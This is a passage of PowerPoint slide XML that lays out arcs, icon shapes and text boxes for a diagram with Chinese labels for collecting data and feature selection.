              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="空心弧 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481070" y="1720215"/>
            <a:ext cx="4876165" cy="4427855"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10304151"/>
              <a:gd name="adj2" fmla="val 1108359"/>
              <a:gd name="adj3" fmla="val 3585"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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3" name="空心弧 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385820" y="1612265"/>
            <a:ext cx="5073015" cy="4689475"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10304151"/>
              <a:gd name="adj2" fmla="val 1215920"/>
              <a:gd name="adj3" fmla="val 4169"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7523480" y="2276475"/>
            <a:ext cx="934720" cy="934720"/>
            <a:chOff x="13843" y="1682"/>
            <a:chExt cx="1472" cy="1472"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 90"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13843" y="1682"/>
              <a:ext cx="1473" cy="14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84530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3465">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 12"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="14263" y="2147"/>
              <a:ext cx="605" cy="492"/>
              <a:chOff x="1550139" y="1314466"/>
              <a:chExt cx="509139" cy="414300"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Freeform 6"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1777255" y="1484179"/>
                <a:ext cx="52412" cy="54907"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10054298" y="2969681"/>
            <a:ext cx="383116" cy="338667"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 136 w 136"/>
              <a:gd name="T1" fmla="*/ 48 h 120"/>
              <a:gd name="T2" fmla="*/ 68 w 136"/>
              <a:gd name="T3" fmla="*/ 0 h 120"/>
              <a:gd name="T4" fmla="*/ 0 w 136"/>
              <a:gd name="T5" fmla="*/ 48 h 120"/>
              <a:gd name="T6" fmla="*/ 37 w 136"/>
              <a:gd name="T7" fmla="*/ 91 h 120"/>
              <a:gd name="T8" fmla="*/ 22 w 136"/>
              <a:gd name="T9" fmla="*/ 120 h 120"/>
              <a:gd name="T10" fmla="*/ 73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6" y="0"/>
                  <a:pt x="68" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="0"/>
                  <a:pt x="0" y="22"/>
                  <a:pt x="0" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67"/>
                  <a:pt x="15" y="83"/>
                  <a:pt x="37" y="91"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="96"/>
                  <a:pt x="37" y="106"/>
                  <a:pt x="22" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="120"/>
                  <a:pt x="54" y="111"/>
                  <a:pt x="73" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="94"/>
                  <a:pt x="136" y="73"/>
                  <a:pt x="136" y="48"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="组合 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7908710" y="3986353"/>
            <a:ext cx="935567" cy="935567"/>
            <a:chOff x="4813816" y="4878917"/>
            <a:chExt cx="935567" cy="935567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 90"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4813816" y="4878917"/>
              <a:ext cx="935567" cy="9355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84530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3465">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5137794" y="5197631"/>
              <a:ext cx="288000" cy="361108"/>
              <a:chOff x="5106627" y="2260366"/>
              <a:chExt cx="324452" cy="406813"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Oval 83"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5111635" y="2260366"/>
                <a:ext cx="316910" cy="103729"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Freeform 81"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Freeform 82"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Freeform 80"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3075182" y="4216655"/>
            <a:ext cx="935567" cy="935567"/>
            <a:chOff x="4368801" y="2472267"/>
            <a:chExt cx="935567" cy="935567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 90"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4368801" y="2472267"/>
              <a:ext cx="935567" cy="9355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84530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3735">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 33"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4633185" y="2730065"/>
              <a:ext cx="384000" cy="433119"/>
              <a:chOff x="5513440" y="1766202"/>
              <a:chExt cx="429274" cy="484183"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Freeform 147"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId15"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId16"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Freeform 149"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId17"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="文本框 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412361" y="4535973"/>
            <a:ext cx="2158365" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>收集</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603952" y="2611352"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>特征</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>选择</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3275878" y="2553756"/>
            <a:ext cx="935567" cy="935567"/>
            <a:chOff x="3096408" y="3340175"/>
            <a:chExt cx="935567" cy="935567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Oval 90"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3096408" y="3340175"/>
              <a:ext cx="935567" cy="935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84530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
